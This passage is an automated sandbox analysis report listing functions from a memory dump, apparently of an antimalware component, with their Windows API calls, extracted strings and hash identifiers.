Opcode Fuzzy Hash: 381a0b8458b779db30d384a644ac36dc085397277a9e0a3e4c76ebab4758a9c9
Instruction Fuzzy Hash: 09F0A421B0874641EE10AB28B8543359320BF7ABA1F900235DB6E465FDCF7CD454C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CD5B2, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57CD5B2
CloseHandle.KERNEL32 ref: 00007FF7B57CDADE

Strings

Store, xrefs: 00007FF7B57CD6F3
[<, xrefs: 00007FF7B57CEBCC
1.1.18500.10, xrefs: 00007FF7B57CD6E2

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: 1.1.18500.10$Store$[<
API String ID: 2962429428-4021750483
Opcode ID: 804c67b36fef93a3b46a66d24224553f2ad48b68fc953a1dfe82f16aaa54b846
Instruction ID: 5a1265d149bc49dfdd0007cd81d52e43926c50bcdc96f46afbed57790e76bc74
Opcode Fuzzy Hash: 804c67b36fef93a3b46a66d24224553f2ad48b68fc953a1dfe82f16aaa54b846
Instruction Fuzzy Hash: 8B316121B0C6C185EA20EB19E4506B9A391FBAAB50FD40132DB5E4779EDF3DE451C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C7DC4, Relevance: 7.6, APIs: 5, Instructions: 68serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF7B57C7DF0
OpenServiceW.ADVAPI32 ref: 00007FF7B57C7E1F
QueryServiceStatusEx.ADVAPI32 ref: 00007FF7B57C7E67
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7E8B
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7E99

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandleOpen$ErrorLastManagerQueryStatus
String ID:
API String ID: 3744063808-0
Opcode ID: ecca80df9b7c267a9750ef923f4f3617c5ce6859134b2c97f1712d4b1333b944
Instruction ID: 37859831e24c1e54efb96e5f19f9cfb6e56d07e7d21903555f31c3dd0679e61a
Opcode Fuzzy Hash: ecca80df9b7c267a9750ef923f4f3617c5ce6859134b2c97f1712d4b1333b944
Instruction Fuzzy Hash: 84218623B1974142EB14AB2AA44026AE7A1FF6AFD0F844135DF4E4376DEF3CE4518610

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B583FA80, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7B5833B8B,?,?,00000000,00007FF7B5833E26,?,?,?,?,?,00007FF7B5833DB2), ref: 00007FF7B583FA9F
FlsSetValue.KERNEL32(?,?,?,00007FF7B5833B8B,?,?,00000000,00007FF7B5833E26,?,?,?,?,?,00007FF7B5833DB2), ref: 00007FF7B583FABE
FlsSetValue.KERNEL32(?,?,?,00007FF7B5833B8B,?,?,00000000,00007FF7B5833E26,?,?,?,?,?,00007FF7B5833DB2), ref: 00007FF7B583FAE6
FlsSetValue.KERNEL32(?,?,?,00007FF7B5833B8B,?,?,00000000,00007FF7B5833E26,?,?,?,?,?,00007FF7B5833DB2), ref: 00007FF7B583FAF7
FlsSetValue.KERNEL32(?,?,?,00007FF7B5833B8B,?,?,00000000,00007FF7B5833E26,?,?,?,?,?,00007FF7B5833DB2), ref: 00007FF7B583FB08

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 04c2c8dd56712b3d1320ac41cf9bde58101d94078121706c982e469ecf8c847b
Instruction ID: d3f3251a5c66d948efe298f821088d724e4fe0a97754b71355f7ff35e2c6d986
Opcode Fuzzy Hash: 04c2c8dd56712b3d1320ac41cf9bde58101d94078121706c982e469ecf8c847b
Instruction Fuzzy Hash: FA115C60B0D28245FA59B72D6591179A2415FA6FB0FC44634EB2E0B7CFDE3CA8A18260

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B583F914, Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7B583F925
FlsSetValue.KERNEL32 ref: 00007FF7B583F944
FlsSetValue.KERNEL32 ref: 00007FF7B583F96C
FlsSetValue.KERNEL32 ref: 00007FF7B583F97D
FlsSetValue.KERNEL32 ref: 00007FF7B583F98E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4fdd56a07fd9b2c9c20d8dcec4d7e7a58b6edba55d463baa966e7fb5f95c674d
Instruction ID: 1e9e3e013a63676828ee311f9b0057967054f9129a5b094caed40eceee434363
Opcode Fuzzy Hash: 4fdd56a07fd9b2c9c20d8dcec4d7e7a58b6edba55d463baa966e7fb5f95c674d
Instruction Fuzzy Hash: E011F810A0D24295F969B739441157992414FB6F70EC40A34EF3E0B2EFFD3CB8A54271

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DEC90, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 221sleeppipeCOMMON

Download Yara Rule

APIs

PeekNamedPipe.KERNEL32 ref: 00007FF7B57DECFE
Sleep.KERNEL32 ref: 00007FF7B57DED77

Part of subcall function 00007FF7B57DE9F8: TraceMessage.ADVAPI32 ref: 00007FF7B57DEA41

Strings

true, xrefs: 00007FF7B57DEF30
false, xrefs: 00007FF7B57DEF3A

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageNamedPeekPipeSleepTrace
String ID: false$true
API String ID: 2453759103-2658103896
Opcode ID: 0fe2fe73a05fd9319824706e99c9ea6339379f5b7e64d53ef739074fd59257ff
Instruction ID: 9369c2e8ba6ee63fa3d11fe684ce333796dbe285d343720fee6748818c7ffd26
Opcode Fuzzy Hash: 0fe2fe73a05fd9319824706e99c9ea6339379f5b7e64d53ef739074fd59257ff
Instruction Fuzzy Hash: 52A19B62B0864286FB11EB69D4402BDB3A1AB6AF88F944531DF5D4779EDE3CD442C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582BE50, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4 ref: 00007FF7B582BECA

Strings

%ls%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X%ls, xrefs: 00007FF7B582BFD9
%ws\, xrefs: 00007FF7B582BF37
<>:"/\|?*, xrefs: 00007FF7B582BE9B

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateUuid
String ID: %ls%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X%ls$%ws\$<>:"/\|?*
API String ID: 1827684710-3883164394
Opcode ID: f22dd2e5bf9b94af570bb54dff53c4c492766df2d81e342d3e1ae3a21798ddab
Instruction ID: 7a6af3ed28ceb86c5a467dee0d2259a8113c8d18bf012d297297c2255fe7a269
Opcode Fuzzy Hash: f22dd2e5bf9b94af570bb54dff53c4c492766df2d81e342d3e1ae3a21798ddab
Instruction Fuzzy Hash: 3B61F922B0D64295EB10AF2DD4002B9BBA1EB66F88F844135EF5C466AFDF3DD161C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E60B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4 ref: 00007FF7B57E60EF

Strings

%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 00007FF7B57E6159
ExpVdm, xrefs: 00007FF7B57E60BA
%ls{%ls}.tmp, xrefs: 00007FF7B57E618E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateUuid
String ID: %08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X$%ls{%ls}.tmp$ExpVdm
API String ID: 1827684710-1035951139
Opcode ID: bc8c441013af90d6f24dcd6158c1239fe8b4488c812dd7162135bc4ba8aed275
Instruction ID: d935a340216e81b68e59b4b5fa1df7a23cd9b81d10f8e55e5e2c51d9d5288ac3
Opcode Fuzzy Hash: bc8c441013af90d6f24dcd6158c1239fe8b4488c812dd7162135bc4ba8aed275
Instruction Fuzzy Hash: 8941BA22B1C6954AFB54EFB9E4506FDBBB4AB59B48F400035EF4D5299EDE38D011CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E9E4C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57E9E9A
RegCloseKey.ADVAPI32 ref: 00007FF7B57E9F0C

Strings

SOFTWARE\Microsoft\Windows\Windows Error Reporting, xrefs: 00007FF7B57E9E6F, 00007FF7B57E9EE7
ForceQueue, xrefs: 00007FF7B57E9EAA

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Open
String ID: ForceQueue$SOFTWARE\Microsoft\Windows\Windows Error Reporting
API String ID: 2976201327-4079889735
Opcode ID: 844e66e4415bb54b1e62a5c4d0b65cf24d451232b8fd1652873011e0f6f2e339
Instruction ID: ed96bd82d03d386b1c2bad24b14506931226d2c88cfa356ee9314b846b767811
Opcode Fuzzy Hash: 844e66e4415bb54b1e62a5c4d0b65cf24d451232b8fd1652873011e0f6f2e339
Instruction Fuzzy Hash: 74212E62B0874281EF05AB19E4102B4B368AFAAF94FD80531DB0D477AEDF7DE552C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E17E8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32 ref: 00007FF7B57E183E
FreeLibrary.KERNEL32 ref: 00007FF7B57E1857

Strings

BINARY, xrefs: 00007FF7B57E182D
MPSIGSTUB, xrefs: 00007FF7B57E1834

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FindFreeLibraryResource
String ID: BINARY$MPSIGSTUB
API String ID: 1800848000-3246460629
Opcode ID: 4cf070f890a8e735dd260d36717d1043bc92f63308057fcc15efd470ba2afdff
Instruction ID: 6de9d35cc60180bcf6255418f05e147011ca5f559d337146600acc9f024298ac
Opcode Fuzzy Hash: 4cf070f890a8e735dd260d36717d1043bc92f63308057fcc15efd470ba2afdff
Instruction Fuzzy Hash: 7221F632B28B4281EB10AF19E441169A764FB6AF98FC48035DB5E0776ECF3CD491C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5848AA0, Relevance: 6.3, APIs: 4, Instructions: 312fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7B5848B2C
WriteFile.KERNEL32 ref: 00007FF7B5848E06
WriteFile.KERNEL32 ref: 00007FF7B5848E51
GetLastError.KERNEL32 ref: 00007FF7B5848F30

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 2b82c374771b893ea6af1ee1795b9bbe3a04262279f0505cc3aa81b8d8f6e8b9
Instruction ID: 67cc66b1c28783a4bed3a5b4192c8f20120d021cf770eda99ae8685ecc141c27
Opcode Fuzzy Hash: 2b82c374771b893ea6af1ee1795b9bbe3a04262279f0505cc3aa81b8d8f6e8b9
Instruction Fuzzy Hash: 84D11322B19A8189E750DF69E4402ACB7B1F766B98B904132DF4D43B9EDE3CD426CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D4CB4, Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582A660: CreateFileW.KERNELBASE ref: 00007FF7B582A6A1

CloseHandle.KERNEL32 ref: 00007FF7B57D5066
CloseHandle.KERNEL32 ref: 00007FF7B57D5077

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

Part of subcall function 00007FF7B582A844: GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF,?,00007FF7B57C6B8B), ref: 00007FF7B582A85E

Strings

Different, xrefs: 00007FF7B57D5013
Identical, xrefs: 00007FF7B57D5009

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileHandle$CreateMessageSizeTrace
String ID: Different$Identical
API String ID: 3840331288-2315570786
Opcode ID: ed39dc2e37894ea12519b49e774f82cb6bbc6231e0c2c17d8da12d5a64755b85
Instruction ID: 957f3bbc892751ab7c70c312dcafda59da347e2e6e42ffc96b4f1a6a406bfb5e
Opcode Fuzzy Hash: ed39dc2e37894ea12519b49e774f82cb6bbc6231e0c2c17d8da12d5a64755b85
Instruction Fuzzy Hash: 8AD19161B0864285EB14BB1DD4406B9A7A1FB6AF98FA40531DF2D436EECF7DE481C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B58494B4, Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000002,00000000,00000000,00000000,00000000,00000000,00007FF7B5853F8D,?,?,?), ref: 00007FF7B58495D7
GetLastError.KERNEL32(?,?,?,?,00000000,?,00000002,00000000,00000000,00000000,00000000,00000000,00007FF7B5853F8D,?,?,?), ref: 00007FF7B5849661

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 65264cdcd87c8ddfe3dcd76f3ab5b255225da1496c5a0e5120808dbd99f20d67
Instruction ID: 60b18d9aaac6d22dd36d897fd4424f1f98caa44709d42f7d334e3ff5651ecac5
Opcode Fuzzy Hash: 65264cdcd87c8ddfe3dcd76f3ab5b255225da1496c5a0e5120808dbd99f20d67
Instruction Fuzzy Hash: C291FA22E1865249FB60EF6994806BDA7A0BB66F98F844135DF0E1364EDF3CD461CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DFBB4, Relevance: 6.1, APIs: 4, Instructions: 96pipeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,00007FF7B57DFB1D), ref: 00007FF7B57DFC3D
GetLastError.KERNEL32(?,?,?,00007FF7B57DFB1D), ref: 00007FF7B57DFC47
DisconnectNamedPipe.KERNEL32(?,?,?,00007FF7B57DFB1D), ref: 00007FF7B57DFCAA
GetLastError.KERNEL32(?,?,?,00007FF7B57DFB1D), ref: 00007FF7B57DFCB4

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$BuffersDisconnectFileFlushNamedPipe
String ID:
API String ID: 272293922-0
Opcode ID: b703ae0708877b982270873ceef3609e90d6f5b41aeb0c68adbd2f3010c784b2
Instruction ID: de8e41a7565ff79cc10884c2e20b2548d7febc89a918a253677a0c6612e89479
Opcode Fuzzy Hash: b703ae0708877b982270873ceef3609e90d6f5b41aeb0c68adbd2f3010c784b2
Instruction Fuzzy Hash: D14176A1B1868681FB14A729D410374A790EFAAF84FA44431CF1D47AAECF3DE5938760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E5F54, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7B57E5F8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7B57E5FA9

Part of subcall function 00007FF7B57E56A0: TraceMessage.ADVAPI32 ref: 00007FF7B57E5712

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7B57E5FE4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7B57E602D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$BuffersCloseFileFlushHandleMessageTrace
String ID:
API String ID: 4071210227-0
Opcode ID: 2d6c012b18430f96f8edfd6645b22d7a90342a0f724243c8564cc62c99f4f55c
Instruction ID: 4223ffa64f9418c5d72d5e20a64cdfdd5e3e3ef3bf31dd3419329f9ab5f75ace
Opcode Fuzzy Hash: 2d6c012b18430f96f8edfd6645b22d7a90342a0f724243c8564cc62c99f4f55c
Instruction Fuzzy Hash: 60315061A0874681FB15FB2DE4503B9A394EF6AF48F944136CB5D422AECF3DD492C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CD546, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57CDADE

Strings

Store, xrefs: 00007FF7B57CD6F3
[<, xrefs: 00007FF7B57CEBCC
1.1.18500.10, xrefs: 00007FF7B57CD6E2

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: 1.1.18500.10$Store$[<
API String ID: 2962429428-4021750483
Opcode ID: 25c7d5825f3d9872b7da43b84cee5519daf011e5158cba98f8c7543223f6b605
Instruction ID: d77c1ed464411cb3f37a896655bb1d21ba81a0f18a460740a2107d698dbe670f
Opcode Fuzzy Hash: 25c7d5825f3d9872b7da43b84cee5519daf011e5158cba98f8c7543223f6b605
Instruction Fuzzy Hash: 7C316321B0C6C185EA60EB19E4506B9A391FFAAB60FD40232DB9D4779EDF3DE451C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582D78C, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL ref: 00007FF7B582D82D
RtlNtStatusToDosError.NTDLL ref: 00007FF7B582D840
SetLastError.KERNEL32 ref: 00007FF7B582D848
GetLastError.KERNEL32 ref: 00007FF7B582D84E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Error$Last$StatusVersion
String ID:
API String ID: 3539761734-0
Opcode ID: 511bd0683092a4367ea2da1d52b76016a120e0bf6448ce2e80be86a66ac91244
Instruction ID: a0ce95124bb525927ff62f63489579b6b53ee8127073ebc618e345ff782963e4
Opcode Fuzzy Hash: 511bd0683092a4367ea2da1d52b76016a120e0bf6448ce2e80be86a66ac91244
Instruction Fuzzy Hash: 67214162E08B8483F7559B39A9013B87360FB79B84F44A225DF8D52557EF38E2E88350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D6E72, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57D6EB1
CloseHandle.KERNEL32 ref: 00007FF7B57D6EDE
CloseHandle.KERNEL32 ref: 00007FF7B57D6EF2

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Strings

, xrefs: 00007FF7B57D6F0D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$MessageTrace
String ID:
API String ID: 2615336596-1278187377
Opcode ID: dd6bd8c5b8e4a9ed608bd6b9172cb6526e5661a932d56410cafcd0eae381b3fd
Instruction ID: 2796a5adf509980439100988fb0f34c191aa1101845cb2d9d667544aa694245f
Opcode Fuzzy Hash: dd6bd8c5b8e4a9ed608bd6b9172cb6526e5661a932d56410cafcd0eae381b3fd
Instruction Fuzzy Hash: 9E113D52B0958185EA60FB59E4507B6A350FFAAF55FC05432CB4E43AAF8F3CD496C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584C374, Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7B584C3A0
GetCurrentThreadId.KERNEL32 ref: 00007FF7B584C3AE
GetCurrentProcessId.KERNEL32 ref: 00007FF7B584C3BA
QueryPerformanceCounter.KERNEL32 ref: 00007FF7B584C3CA

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: fa6e763bfbf57483f581c05cd70d672944c7b3cc3a4525f61c7c8f25740821c6
Instruction ID: 7e3ad581b68f1f97c01de20aae024600df369f739c75317ae9121513ab2e4876
Opcode Fuzzy Hash: fa6e763bfbf57483f581c05cd70d672944c7b3cc3a4525f61c7c8f25740821c6
Instruction Fuzzy Hash: 25117022A04F418AEB10DF29E8452B433A4FB2EB59F441A31EB5D427ACDF3CD1A5C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C4FF4, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4 ref: 00007FF7B57C509C

Strings

EnableETW, xrefs: 00007FF7B57C505F, 00007FF7B57C5082
1.1.18500.10, xrefs: 00007FF7B57C528D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
